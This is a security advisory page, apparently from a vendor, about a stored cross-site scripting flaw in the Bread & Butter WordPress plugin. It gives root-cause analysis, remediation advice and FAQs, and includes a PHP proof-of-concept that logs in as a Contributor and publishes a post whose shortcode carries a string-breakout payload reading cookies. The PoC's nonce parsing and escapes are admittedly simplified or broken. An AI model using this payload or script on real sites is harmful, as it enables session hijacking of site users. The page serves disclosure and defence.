What is CVE-2026-4279?

CVE-2026-4279 is a stored cross-site scripting (XSS) vulnerability in the Bread & Butter plugin for WordPress, affecting versions up to 8.2.0.25. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into pages via the ‘breadbutter-customevent-button’ shortcode.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the customEventShortCodeButton() function. The ‘event’ attribute from the shortcode is directly interpolated into a JavaScript string without proper escaping, allowing attackers to inject malicious scripts that execute when users click the button.

Who is affected by this vulnerability?

Any WordPress site using the Bread & Butter plugin version 8.2.0.25 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability to execute malicious scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Bread & Butter plugin installed. If it is version 8.2.0.25 or earlier, your site is susceptible to CVE-2026-4279. Additionally, review user roles to identify any Contributor-level accounts.

What is the severity level of this vulnerability?

CVE-2026-4279 has a CVSS score of 6.4, classified as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk, particularly because it allows authenticated users to execute scripts that can compromise site security.

What are the potential impacts of this vulnerability?

If exploited, this vulnerability can lead to session hijacking, cookie theft, site defacement, or redirection to malicious sites. As a stored XSS vulnerability, it can affect all users who view the compromised page, including administrators.

How can I fix or mitigate this issue?

To remediate CVE-2026-4279, update the Bread & Butter plugin to a version that addresses the vulnerability. Additionally, ensure that the plugin applies proper output escaping using esc_js() or esc_attr() on the ‘event’ attribute in the customEventShortCodeButton() function.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Bread & Butter plugin until a fix is applied. Additionally, review user roles and limit Contributor access to trusted users only, reducing the risk of exploitation.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker with Contributor access can create a post with a malicious shortcode. It shows how a crafted payload can break out of the JavaScript string context, allowing the attacker to execute arbitrary code when a user clicks the button.

How can I protect my site from similar vulnerabilities in the future?

To protect against similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement input validation and output escaping best practices in custom code. Additionally, consider using security plugins that can help identify and mitigate potential threats.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of security vulnerability where an attacker injects malicious scripts into content that is stored on the server. When other users access the affected content, the scripts execute in their browsers, potentially leading to data theft or site compromise.

Can this vulnerability affect administrators?

Yes, since CVE-2026-4279 is a stored XSS vulnerability, it can affect all users who view the compromised content, including administrators. This can lead to severe consequences, including full site compromise.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 23, 2026

CVE-2026-4279: Bread & Butter: Content Gating for Verified Leads <= 8.2.0.25 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (bread-butter)

CVE ID CVE-2026-4279

Plugin bread-butter

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 8.2.0.25

Patched Version —

Disclosed April 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4279 (metadata-based): This vulnerability allows authenticated attackers with Contributor-level access or higher to execute stored cross-site scripting (XSS) via the ‘breadbutter-customevent-button’ shortcode in the Bread & Butter plugin for WordPress, up to version 8.2.0.25. The vulnerability has a CVSS score of 6.4 (Medium) and is classified under CWE-79: Improper Neutralization of Input During Web Page Generation.

The root cause is insufficient input sanitization and output escaping in the customEventShortCodeButton() function. This function takes the ‘event’ attribute value from the shortcode and directly interpolates it into a JavaScript string within an onclick HTML attribute. The developer omitted the use of esc_attr() or esc_js() on this attribute, unlike the sister function customEventShortCode() which correctly uses esc_js(). This omission allows attackers to inject arbitrary JavaScript code that breaks out of the string context and executes when a user clicks the button.

Exploitation requires an attacker to have Contributor-level access or higher in WordPress. The attacker creates a new post or page and inserts the ‘breadbutter-customevent-button’ shortcode with a malicious ‘event’ attribute. The payload must break out of the JavaScript string context, for example: ‘myevent’;alert(document.cookie);’. When any user views the page and clicks the button, the injected script executes in their browser context.

Remediation requires the plugin developer to apply proper output escaping on the ‘event’ shortcode attribute within the customEventShortCodeButton() function. The fix should use esc_js() or esc_attr() depending on the context. Since the attribute value is used in a JavaScript string within an HTML attribute, both wp_kses() for HTML context and esc_js() for JavaScript context are likely required. The sister function customEventShortCode() provides a model for the correct escaping pattern.

Impact includes the ability to execute arbitrary JavaScript in the context of any user who views the affected page and clicks the injected button. This can lead to session hijacking, cookie theft, defacement, or redirection to malicious sites. Since this is a stored XSS, the attack persists across sessions and can affect all users, including administrators, potentially leading to complete site compromise.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4279 - Bread & Butter: Content Gating for Verified Leads <= 8.2.0.25 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

/**
 * This PoC demonstrates exploitation of CVE-2026-4279.
 * Assumptions:
 * - The target WordPress site has the vulnerable Bread & Butter plugin installed (<= 8.2.0.25)
 * - An attacker account with Contributor-level access exists
 * - The victim will view the injected post and click the button
 * - WordPress AJAX login is available or cookie-based authentication is used
 */

// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site
$username = 'attacker'; // WordPress username with Contributor+ role
$password = 'attacker_password'; // Corresponding password

// Malicious payload: Break out of JavaScript string context in the onclick attribute
// The 'event' attribute is injected into: onclick="sendCustomEvent('{EVENT_VALUE}', ...)"
$payload = "test';alert(document.cookie);//";

// Step 1: Authenticate and obtain cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);
if (curl_error($ch)) {
    die('Login failed: ' . curl_error($ch) . "n");
}

// Step 2: Get a nonce for post creation
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_HEADER, true);
$editor_response = curl_exec($ch);

// Extract nonce from the response (simplified - real implementation would parse HTML)
preg_match('/wp-nonce-attr[^>]+value="([^"]+)"/', $editor_response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';

// Step 3: Create a new post with the malicious shortcode
$post_content = 'This is a test post with malicious button: [breadbutter-customevent-button event="' . $payload . '" label="Click me"]';

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'post_title' => 'XSS Test Post',
    'content' => $post_content,
    'post_status' => 'publish',
    'post_type' => 'post',
    '_wpnonce' => $nonce,
    'action' => 'editpost'
]));
curl_setopt($ch, CURLOPT_HEADER, true);
$post_response = curl_exec($ch);

// Extract the new post URL from redirect
preg_match('/Location: ([^n]+)/', $post_response, $redirect_matches);
$new_post_url = isset($redirect_matches[1]) ? trim($redirect_matches[1]) : '';
echo "Post created at: $new_post_urln";
echo "Payload injected: $payloadn";
echo "Victim must click the button to trigger XSS.n";

curl_close($ch);

Frequently Asked Questions

What is CVE-2026-4279?
Understanding the vulnerability
CVE-2026-4279 is a stored cross-site scripting (XSS) vulnerability in the Bread & Butter plugin for WordPress, affecting versions up to 8.2.0.25. It allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into pages via the ‘breadbutter-customevent-button’ shortcode.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the customEventShortCodeButton() function. The ‘event’ attribute from the shortcode is directly interpolated into a JavaScript string without proper escaping, allowing attackers to inject malicious scripts that execute when users click the button.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Bread & Butter plugin version 8.2.0.25 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability to execute malicious scripts.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Bread & Butter plugin installed. If it is version 8.2.0.25 or earlier, your site is susceptible to CVE-2026-4279. Additionally, review user roles to identify any Contributor-level accounts.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-4279 has a CVSS score of 6.4, classified as Medium severity. This indicates that while the vulnerability is not critical, it poses a significant risk, particularly because it allows authenticated users to execute scripts that can compromise site security.
What are the potential impacts of this vulnerability?
Consequences of exploitation
If exploited, this vulnerability can lead to session hijacking, cookie theft, site defacement, or redirection to malicious sites. As a stored XSS vulnerability, it can affect all users who view the compromised page, including administrators.
How can I fix or mitigate this issue?
Remediation steps
To remediate CVE-2026-4279, update the Bread & Butter plugin to a version that addresses the vulnerability. Additionally, ensure that the plugin applies proper output escaping using esc_js() or esc_attr() on the ‘event’ attribute in the customEventShortCodeButton() function.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Bread & Butter plugin until a fix is applied. Additionally, review user roles and limit Contributor access to trusted users only, reducing the risk of exploitation.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker with Contributor access can create a post with a malicious shortcode. It shows how a crafted payload can break out of the JavaScript string context, allowing the attacker to execute arbitrary code when a user clicks the button.
How can I protect my site from similar vulnerabilities in the future?
Best practices for security
To protect against similar vulnerabilities, regularly update all plugins and themes, conduct security audits, and implement input validation and output escaping best practices in custom code. Additionally, consider using security plugins that can help identify and mitigate potential threats.
What is stored cross-site scripting (XSS)?
Defining the attack type
Stored XSS is a type of security vulnerability where an attacker injects malicious scripts into content that is stored on the server. When other users access the affected content, the scripts execute in their browsers, potentially leading to data theft or site compromise.
Can this vulnerability affect administrators?
Risk to high-level users
Yes, since CVE-2026-4279 is a stored XSS vulnerability, it can affect all users who view the compromised content, including administrators. This can lead to severe consequences, including full site compromise.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations